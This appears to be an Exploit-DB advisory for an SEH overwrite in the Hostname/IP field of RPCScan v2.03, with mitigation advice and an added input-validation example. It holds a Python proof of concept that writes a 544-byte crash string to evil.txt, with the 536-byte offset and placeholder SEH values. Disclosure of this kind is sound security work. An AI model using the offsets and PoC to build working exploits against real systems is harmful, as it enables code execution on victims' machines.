Vendor: RPCScan
By: Nipun Jaswal
CVSS: 7.6 (HIGH)
Vulnerability Type: SEH Overwrite POC
CWE: 119
Product Name: RPCScan
Affected Version From: 2.03
Affected Version To: 2.03
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Home Basic
Year: 2016

RPCScan v2.03 Hostname/IP Field SEH Overwrite POC

RPCScan v2.03 contains an SEH overwrite. By supplying an oversized string in the Hostname/IP field, an attacker overwrites the SEH frame and can execute arbitrary code. The offset to the SEH frame is 536 bytes; the next-SEH pointer and the handler address that follow it are 4 bytes each.

Mitigation:

Upgrade to the latest version of RPCScan (a release newer than v2.03).
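As an added example (not part of the advisory and not RPCScan's own code): an input validator for a Hostname/IP field that enforces RFC 1123 hostname limits and literal IP parsing, so the 544-byte string the PoC below writes is rejected before it can reach a fixed-size buffer. The constants and function names are assumptions for this example.

```python
import ipaddress
import re

# RFC 1123 hostname grammar: labels of 1-63 alphanumerics/hyphens that do not
# start or end with a hyphen; the whole name is at most 253 characters.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
MAX_HOSTNAME_LEN = 253

# Layout from the RPCScan 2.03 crash: 536 bytes of padding, then a 4-byte
# next-SEH pointer and a 4-byte handler address (assumed constants here).
SEH_OFFSET = 536
OVERFLOW_LEN = SEH_OFFSET + 4 + 4  # 544 bytes reach the handler slot


def is_valid_ip(value: str) -> bool:
    """Accept only literal IPv4/IPv6 addresses."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def is_valid_hostname(value: str) -> bool:
    """Accept only names that satisfy RFC 1123 length and character rules."""
    if not value or len(value) > MAX_HOSTNAME_LEN:
        return False
    name = value[:-1] if value.endswith(".") else value  # tolerate a trailing dot
    return all(_LABEL_RE.match(label) for label in name.split("."))


def validate_target(value: str) -> str:
    """Validate a Hostname/IP field value before it is copied anywhere.

    Raises ValueError for anything that is neither a syntactic hostname nor an
    IP literal; the length limits alone are enough to stop the PoC string.
    """
    if is_valid_ip(value) or is_valid_hostname(value):
        return value
    raise ValueError("Hostname/IP field rejected: %d chars, not a hostname or IP" % len(value))


def build_poc_string() -> str:
    """Constructed copy of the advisory's evil.txt layout, used only to exercise the filter."""
    return "A" * SEH_OFFSET + "B" * 4 + "C" * 4
```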

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title     : RPCScan v2.03 Hostname/IP Field SEH Overwrite POC
# Discovery by      : Nipun Jaswal
# Email             : mail@nipunjaswal.info
# Discovery Date    : 08/05/2016
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.mcafee.com/in/downloads/free-tools/rpcscan.aspx#
# Tested Version    : 2.03
# Vulnerability Type: SEH Overwrite POC
# Tested on OS      : Windows 7 Home Basic
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################

# SEH chain of main thread, as shown by the debugger after the crash
# Address    SE handler
# 0012FAA0   43434343              <- handler slot now holds "CCCC"
# 42424242   *** CORRUPT ENTRY ***  <- next-SEH pointer now holds "BBBB"

# Offset to the SEH frame is 536 bytes of padding
buffer = b"A" * 536
# Address of the next SEH frame (4 bytes)
nseh = b"B" * 4
# Address to the handler code, generally a P/P/R (POP/POP/RET) address (4 bytes)
seh = b"C" * 4

# Write the 544-byte payload as raw bytes; bytes literals keep the file identical
# under Python 2 and Python 3 (a str would fail on a binary handle in Python 3).
with open("evil.txt", "wb") as f:
    f.write(buffer + nseh + seh)